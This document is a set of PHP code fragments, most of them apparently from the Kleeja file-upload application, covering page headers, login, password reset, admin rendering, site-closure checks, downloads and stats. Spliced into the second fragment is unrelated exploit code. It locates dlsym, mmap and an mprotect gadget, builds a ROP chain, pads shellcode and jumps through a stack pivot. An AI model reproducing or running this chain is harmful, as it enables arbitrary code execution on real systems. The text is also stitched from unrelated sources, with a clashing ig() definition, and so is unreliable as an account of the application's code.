/** * Print header part of the page * * @param string $title [optional] The page title * @param string $extra_head_code [optional] any extra codes to include it between head tag * @return void */ function kleeja_header($title = '', $extra_head_code = '') { global $user, $lang, $config, $extras, $plugin; #is user ? and username $username = $user->is_user() ? $user->data['name'] : $lang['GUST']; #our default charset $charset = 'utf-8'; #check for extra header $extras['header'] = empty($extras['header']) ? false : $extras['header']; ($hook = $plugin->run_hook('kleeja_header_links_func')) ? eval($hook) : null; //run hook $current_page = ig('go') ? g('go', 'str') : (empty($_GET) ? 'index' : ''); //kleeja_add_form_key('login'); //$tpl->assign("action_login", 'ucp.php?go=login' . (isset($_GET['return']) ? '&return=' . htmlspecialchars($_GET['return']) : '')); include get_template_path('header.php'); ($hook = $plugin->run_hook('kleeja_header_func')) ? eval($hook) : null; //run hook flush(); }
$dlsym = getplt($addr, "_dlsym"); // get plt entry nogc($dlsym); $mmap_plt = getplt($addr, "_mmap"); // get plt entry $mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6); nogc($mmap); $mprotect = gadget(findmhfromaddr($mmap), "b84a000002"); // find b84a000002 movl $0x200004a, %eax -> mprotect syscall nogc($mprotect); function ig($a, $b) { return ibuf(gadget($a, $b), 8); } $arg1 = ig($addr, "5fc3"); $arg2 = ig($addr, "5ec3"); $arg3 = ig(findmhfromaddr($mmap), "5ac3"); $stack = $arg1; $stack .= w64($all['ptr'] & ~0xfff); $stack .= $arg2; $stack .= w64(4096 * 2); $stack .= $arg3; $stack .= w64(7); $stack .= w64($mprotect); $stack .= w64($all['ptr']); $stack .= w64($dlsym); $pad = str_repeat("z", 2048 + (0x10 - (strlen($shellcode) & 0xf))); $payload = $shellcode . $pad . $stack; memcpy($all, $payload); jump(stackPivot($addr), ibuf(0, 8) . ibuf(0, 8) . ibuf(0, 8) . ig($addr, "5cc3") . ibuf($all['ptr'] + strlen($shellcode) + strlen($pad), 8));
if ($users->login($data['username'], $data['password'], $remember_me)) { $show_form = false; $show_after_login = true; } else { $ERRORS[] = 'The given information is incorrect!'; } } } ?> <!-- you already in --> <?php if ($you_are_a_user) { ?> <div class="alert alert-warning"> <?php if (ig('logout')) { ?> You logged out, <a href="./">[ home ]</a> <?php } else { ?> You already logged-in, do you want to <a href="./login.php?logout=1">log out? <?php } ?> </div> <?php } ?> <!-- show the ERRORS -->
//run hook break; case 'get_pass': #if not default system, let's give him a link for integrated script if ($config['user_system'] != 1) { $text = '<a href="' . (!empty($forgetpass_script_path) ? $forgetpass_script_path : $script_path) . '">' . $lang['LOST_PASS_FORUM'] . '</a>'; kleeja_info($text, $lang['PLACE_NO_YOU']); } #page info $current_template = 'get_pass.php'; $current_title = $lang['GET_LOSTPASS']; $action = 'ucp.php?go=get_pass'; #no error yet $ERRORS = false; # As in ucp.php?go=get_pass&activation_key=1af3405662ec373d672d003cf27cf998&uid=1 if (ig('activation_key') && ig('uid')) { ($hook = $plugin->run_hook('get_pass_activation_key')) ? eval($hook) : null; //run hook $h_key = preg_replace('![^a-z0-9]!', '', g('activation_key', 'str')); $u_id = g('uid', 'int'); #if it's empty ? if (trim($h_key) == '') { big_error('No hash key', 'This is not a good link for activation ... Try again!'); } $query = array('SELECT' => 'new_password', 'FROM' => "{$dbprefix}users", 'WHERE' => "hash_key='" . $SQL->escape($h_key) . "' AND id=" . $u_id); ($hook = $plugin->run_hook('get_pass_f_query')) ? eval($hook) : null; //run hook $result = $SQL->build($query); if ($SQL->num($result)) { $npass = $SQL->fetch($result); $npass = $npass['new_password'];
big_error('Loading !', 'Error while loading: ' . $adm_extensions[$go_to] . '/' . $go_to); } ($hook = $plugin->run_hook('end_admin_page')) ? eval($hook) : null; //run hook #no style defined if (empty($current_template)) { $text = 'THERE IS NO TEMPLATE ASSIGNED FOR THIS PAGE!'; $current_template = 'info.php'; } $go_menu_html = ''; if (isset($go_menu)) { foreach ($go_menu as $m => $d) { $go_menu_html .= '<li class="' . ($d['current'] ? 'active' : '') . '" id="c_' . $d['goto'] . '"><a href="' . $d['link'] . '" onclick="' . (isset($d['confirm']) && $d['confirm'] ? 'javascript:return confirm_from();' : '') . '">' . $d['name'] . '</a></li>'; } } #header if (!ig('_ajax_')) { include get_template_path('header.php'); } #body if (!ig('_ajax_')) { $is_ajax = 'no'; include get_template_path($current_template); } #footer if (!ig('_ajax_')) { include get_template_path('footer.php'); } # at end garbage_collection(); exit;
define('ADMIN_STYLE_PATH', $config['siteurl'] . 'admin/' . ADMIN_STYLE_NAME . '/'); define('ADMIN_STYLE_PATH_ABS', PATH . 'admin/' . ADMIN_STYLE_NAME . '/'); #get languge of common get_lang('common'); #ban system get_ban(); #install.php exists, raise a message if (file_exists(PATH . 'install') && !defined('IN_ADMIN') && !defined('IN_LOGIN') && !defined('DEV_STAGE')) { #Different message for admins! delete install folder kleeja_info(user_can('enter_acp') ? $lang['DELETE_INSTALL_FOLDER'] : $lang['WE_UPDATING_KLEEJA_NOW'], $lang['SITE_CLOSED']); } #site close message if enabled $login_page = ''; if ($config['siteclose'] == '1' && !user_can('enter_acp') && !defined('IN_LOGIN') && !defined('IN_ADMIN')) { #if download, images ? if (defined('IN_DOWNLOAD') && (ig('img') || ig('thmb') || ig('thmbf') || ig('imgf'))) { @$SQL->close(); $fullname = "images/site_closed.jpg"; $filesize = filesize($fullname); header("Content-length: {$filesize}"); header("Content-type: image/jpg"); readfile($fullname); exit; } #Send a 503 HTTP response code to prevent search bots from indexing the maintenace message header('HTTP/1.1 503 Service Temporarily Unavailable'); kleeja_info($config['closemsg'], $lang['SITE_CLOSED']); } #exceed total size if ($stat_sizes >= $config['total_size'] * 1048576 && !defined('IN_LOGIN') && !defined('IN_ADMIN')) { // Send a 503 HTTP response code to prevent search bots from indexing the maintenace message
$is_image = true; } else { #not exists file ($hook = $plugin->run_hook('not_exists_qr_down_file')) ? eval($hook) : null; //run hook kleeja_err($lang['FILE_NO_FOUNDED']); } } #prevent bug, where you can download file, not image using imagef- url, bug:1134 if ((ig('img') || ig('thmb') || ig('thmbf') || ig('imgf')) && !$is_image) { $f = 'images'; $n = 'not_exists.jpg'; $is_image = true; } #downalod porcess $path_file = ig('thmb') || ig('thmbf') ? "./{$f}/thumbs/{$n}" : "./{$f}/{$n}"; $chunksize = 1024 * 120; //1 kelobyte * 120 = 120kb that will send to user every loop $resuming_on = true; ($hook = $plugin->run_hook('down_go_page')) ? eval($hook) : null; //run hook # this is a solution to ignore downloading through the file, redirecct to the actual file # where you can add 'define("MAKE_DOPHP_301_HEADER", true);' in config.php to stop the load # if there is any. if (defined('MAKE_DOPHP_301_HEADER')) { header('HTTP/1.1 301 Moved Permanently'); header('Location: ' . $path_file); garbage_collection(); exit; } #unable to read the file?
$current_title = $lang['STATS']; $current_template = 'stats.php'; $files_st = $stat_files; $imgs_st = $stat_imgs; $users_st = $stat_users; $sizes_st = readable_size($stat_sizes); $lst_reg = empty($stat_last_user) ? $lang['UNKNOWN'] : $stat_last_user; $on_muoe = kleeja_date($on_muoe); ($hook = kleeja_run_hook('stats_go_page')) ? eval($hook) : null; //run hook break; # Depreacted from 1rc6+, see do.php # Depreacted from 1rc6+, see do.php case 'down': #go.php?go=down&n=$1&f=$2&i=$3 if (ig('n')) { $url_file = $config['mod_writer'] == 1 ? $config['siteurl'] . 'download' . g('i', 'int') . '.html' : $config['siteurl'] . 'do.php?id=' . g('n', 'int'); } else { $url_file = $config['siteurl']; } $SQL->close(); #redirect and exit redirect($url_file, true, true); break; case 'resync': #This is a part of ACP, only admins can access this part of page if (!user_can('enter_acp')) { kleeja_info($lang['HV_NOT_PRVLG_ACCESS']); exit; } #get admin functions